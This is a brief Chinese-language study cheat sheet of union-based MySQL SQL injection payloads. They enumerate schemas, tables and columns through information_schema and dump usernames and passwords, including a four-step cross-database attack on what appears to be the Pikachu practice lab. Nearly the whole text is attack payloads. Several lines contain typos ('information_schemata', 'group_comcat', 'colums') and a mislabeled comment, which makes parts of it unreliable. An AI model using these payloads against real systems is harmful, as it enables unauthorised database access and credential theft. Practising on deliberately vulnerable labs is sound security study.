sql注入语句要点

information_schema 5.0及以上版本系统数据库
information_schema.tables 数据库表名称
information_schema.columns 数据库列名称
information_schema.schemata 存取所有数据库
schema_name. 数据库名
table_name 表名
table_schema 数据库名

group_concat(schema_name) from information_schema.schemata;

group_concat(table_name) from information_schema.tables; (where table_schema='数据库名')

group_concat(column_name) from information_schema.columns； (where table_schema='数据库名' and table_name='数据库什么表')

简单版：union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())。//查看有什么表

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='上面查到的表')。//查看有什么列

union select 1,group_concat(username,password) from users //查看账户密码

跨库注入：

条件：当前数据库用户必须为root

第一步：
union select 1,group_concat(schema_name) ,3 from information_schemata.schemata // 获取当前所有数据库

第二步
union select 1,group_comcat(table_name) ,3 from information_schema.tables where table_schema='pikachu' //获取指定数据库下的表名

第三步
union select 1,group_concat(column_name) ,3 from information_schema.colums where table_schema='pikachu' and table_name='users' //获取指定数据库下的表名下的列名

第四步
union select 1,group_concat(username),group_concat(password) from pikachu.users //获取指定数据库下的表名下的列名下的账号密码